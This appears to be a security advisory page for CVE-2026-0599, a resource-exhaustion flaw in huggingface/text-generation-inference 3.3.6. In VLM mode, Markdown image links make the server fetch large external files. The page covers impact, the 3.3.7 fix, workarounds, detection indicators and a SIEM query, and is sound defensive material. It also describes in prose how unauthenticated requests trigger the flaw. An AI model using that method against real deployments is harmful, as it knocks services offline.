CVE-2026-0599
📋 TL;DR
This vulnerability in huggingface/text-generation-inference allows unauthenticated attackers to trigger resource exhaustion by exploiting unbounded external image fetching. Attackers can send malicious Markdown image links that cause the system to download large files, consuming memory, CPU, and network bandwidth. All deployments using version 3.3.6 with VLM mode enabled are affected.
💻 Affected Systems
- huggingface/text-generation-inference
⚠️ Risk & Real-World Impact
Worst Case
Complete system crash due to memory exhaustion, network bandwidth saturation, and CPU overutilization, potentially causing denial of service and data loss.
Likely Case
Service degradation or temporary unavailability due to resource exhaustion, requiring system restart and cleanup.
If Mitigated
Minimal impact if proper resource limits and authentication are configured, though some performance degradation may still occur.
🎯 Exploit Status
Exploitation requires only sending HTTP requests with malicious Markdown image links. No authentication or special privileges needed.
🛠️ Fix & Mitigation
✅ Official Fix
Patch Version: 3.3.7
Vendor Advisory: https://github.com/huggingface/text-generation-inference/commit/24ee40d143d8d046039f12f76940a85886cbe152
Restart Required: Yes
Instructions:
1. Stop the text-generation-inference service. 2. Update to version 3.3.7 using package manager or direct installation. 3. Restart the service. 4. Verify the update was successful.
🔧 Temporary Workarounds
Disable VLM Mode
allDisable Vision-Language Model mode to prevent image link processing
Set environment variable or configuration to disable VLM features
Implement Rate Limiting
linuxAdd rate limiting to prevent multiple exploitation attempts
Configure reverse proxy (nginx/apache) with rate limiting rules
🧯 If You Can't Patch
- Implement strict network egress filtering to block external HTTP requests from the service
- Deploy resource limits (memory, CPU) and monitoring to detect and mitigate exploitation attempts
🔍 How to Verify
Check if Vulnerable:
Check if running version 3.3.6 of huggingface/text-generation-inference with VLM mode enabled
Check Version:
docker inspect <container_name> | grep -i version OR check package manager output
Verify Fix Applied:
Confirm version is 3.3.7 or higher and test that external image fetching is properly bounded
📡 Detection & Monitoring
Log Indicators:
- Unusually large HTTP GET requests to external domains
- Memory usage spikes
- CPU utilization spikes
- Multiple failed requests due to token limits
Network Indicators:
- Outbound HTTP traffic to unusual domains
- Large data downloads from external sources
- Increased network bandwidth usage
SIEM Query:
source="text-generation-inference" AND (http_method="GET" AND url CONTAINS "http://" OR "https://") AND bytes_transferred > 1000000